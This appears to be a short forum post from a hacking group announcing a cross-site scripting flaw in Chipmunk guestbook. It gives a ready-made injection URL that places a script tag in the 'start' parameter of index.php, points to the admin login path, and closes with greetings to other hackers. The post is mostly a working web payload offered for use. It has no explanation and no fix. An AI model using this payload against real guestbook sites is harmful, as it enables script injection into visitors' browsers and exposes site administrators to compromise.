Xss exploit in Chipmunk guestbook

forum type : Chipmunk guestbook

bug found by : black-code

team : site-down

type : Xss

black-code:

codes :

http://www.xxx.com/scambi/index.php?start='><script>alert(10)</script>

path to admin login:

http://www.xxx.com/path/admin

All my respect to my friend sweet-devil , lezr.com , g123g.net ..

done .. peace

[ reply ]